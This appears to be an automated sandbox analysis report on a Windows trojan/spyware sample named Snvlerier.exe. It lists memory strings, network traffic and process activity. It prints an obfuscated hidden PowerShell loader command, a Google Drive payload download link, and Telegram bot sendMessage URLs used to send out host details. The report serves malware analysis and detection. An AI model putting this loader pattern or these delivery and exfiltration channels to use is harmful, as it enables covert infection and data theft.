            Source: powershell.exe, 00000001.00000002.2185474928.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: msiexec.exe, 00000006.00000002.3066757142.000000002144B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: powershell.exe, 00000001.00000002.2185474928.0000000004691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20a
            Source: msiexec.exe, 00000006.00000003.2225341752.000000000581A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000216C1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.00000000216F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000216BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: powershell.exe, 00000001.00000002.2188765329.00000000056FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2188765329.00000000056FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2188765329.00000000056FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000006.00000002.3053737496.000000000576A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/HL
            Source: msiexec.exe, 00000006.00000002.3053737496.000000000576A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/XL
            Source: msiexec.exe, 00000006.00000002.3053737496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3064717273.00000000209C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1o_nnklIpduc3m7_4gtk6vGG-tgHcGRhM
            Source: msiexec.exe, 00000006.00000002.3053737496.000000000576A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1o_nnklIpduc3m7_4gtk6vGG-tgHcGRhMFS
            Source: msiexec.exe, 00000006.00000002.3053737496.00000000057C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259064820.00000000057DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259151965.0000000005814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000006.00000002.3053737496.00000000057C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259064820.00000000057DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259151965.0000000005814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Aq
            Source: msiexec.exe, 00000006.00000003.2259064820.00000000057DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259151965.0000000005814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Fp
            Source: msiexec.exe, 00000006.00000003.2225341752.000000000581A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3053737496.00000000057C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1o_nnklIpduc3m7_4gtk6vGG-tgHcGRhM&export=download
            Source: msiexec.exe, 00000006.00000002.3053737496.00000000057C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259064820.00000000057DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2259151965.0000000005814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1o_nnklIpduc3m7_4gtk6vGG-tgHcGRhM&export=downloade
            Source: powershell.exe, 00000001.00000002.2185474928.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2188765329.00000000056FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000215BE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.000000002154F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000006.00000002.3066949084.000000002154F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000006.00000002.3066949084.0000000021579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000215BE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.00000000215E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
            Source: msiexec.exe, 00000006.00000003.2225341752.000000000581A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000006.00000002.3069099861.0000000022651000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.0000000022780000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000227CE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225DC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002262A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000228A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: msiexec.exe, 00000006.00000002.3069099861.000000002262D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002275C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002287F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.0000000022787000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: msiexec.exe, 00000006.00000002.3069099861.0000000022651000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.0000000022780000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021608000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000227CE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225DC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002262A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000228A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: msiexec.exe, 00000006.00000002.3069099861.000000002262D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002275C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.000000002287F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.0000000022787000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3069099861.00000000225E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: msiexec.exe, 00000006.00000002.3066757142.000000002144B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: msiexec.exe, 00000006.00000003.2225341752.000000000581A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000006.00000003.2225341752.000000000581A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000006.00000003.2225341752.000000000581A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000006.00000003.2225341752.000000000581A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.0000000021693000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3066949084.00000000216A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ionos.com/help/index.php?id=2425&ip=8.46.123.33&c=hd&r=1MPXMa-1tMkBm3Mnq-00Nj5b
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000216F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000216E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
            Source: msiexec.exe, 00000006.00000002.3066949084.00000000216ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49827 version: TLS 1.2
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_00405138 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405138

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Snvlerier.exeJump to dropped file
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_0040324D EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324D
            Source: C:\Users\user\Desktop\Snvlerier.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_004049770_2_00404977
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_004062C70_2_004062C7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0087DFE01_2_0087DFE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ACD2786_2_02ACD278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02AC53626_2_02AC5362
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ACC1466_2_02ACC146
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ACC7386_2_02ACC738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ACC4686_2_02ACC468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ACCA086_2_02ACCA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ACE9886_2_02ACE988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02AC3E096_2_02AC3E09
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ACCFAA6_2_02ACCFAA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ACCCD86_2_02ACCCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02AC71186_2_02AC7118
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02AC3A916_2_02AC3A91
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02AC29EC6_2_02AC29EC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ACF9616_2_02ACF961
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ACE97A6_2_02ACE97A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02AC9DE06_2_02AC9DE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA95486_2_23AA9548
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AACCA06_2_23AACCA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAFC686_2_23AAFC68
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA9C706_2_23AA9C70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAF3A86_2_23AAF3A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA8BA06_2_23AA8BA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA17A06_2_23AA17A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAF3B86_2_23AAF3B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA178F6_2_23AA178F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA8B916_2_23AA8B91
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA9BF86_2_23AA9BF8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA93286_2_23AA9328
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA0B206_2_23AA0B20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA0B306_2_23AA0B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAEB086_2_23AAEB08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAEF606_2_23AAEF60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAEF516_2_23AAEF51
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAE6A06_2_23AAE6A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAE6B06_2_23AAE6B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA1E806_2_23AA1E80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAEAF86_2_23AAEAF8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AADE006_2_23AADE00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA1E706_2_23AA1E70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAE2586_2_23AAE258
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAE2576_2_23AAE257
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAD9A86_2_23AAD9A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAD9996_2_23AAD999
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AADDF16_2_23AADDF1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA29686_2_23AA2968
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAD5406_2_23AAD540
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA295B6_2_23AA295B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAD5506_2_23AAD550
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AACC8F6_2_23AACC8F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAD0E96_2_23AAD0E9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAD0F86_2_23AAD0F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA50286_2_23AA5028
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA003F6_2_23AA003F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAF8026_2_23AAF802
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA00076_2_23AA0007
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA50186_2_23AA5018
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAF8106_2_23AAF810
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AA00406_2_23AA0040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_23AAFC5E6_2_23AAFC5E
            Source: Snvlerier.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/14@6/6
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_0040443B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040443B
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
            Source: C:\Users\user\Desktop\Snvlerier.exeFile created: C:\Users\user\AppData\Local\Temp\nsm2DDA.tmpJump to behavior
            Source: Snvlerier.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Snvlerier.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Snvlerier.exeVirustotal: Detection: 27%
            Source: C:\Users\user\Desktop\Snvlerier.exeFile read: C:\Users\user\Desktop\Snvlerier.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Snvlerier.exe "C:\Users\user\Desktop\Snvlerier.exe"
            Source: C:\Users\user\Desktop\Snvlerier.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Snvlerier.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
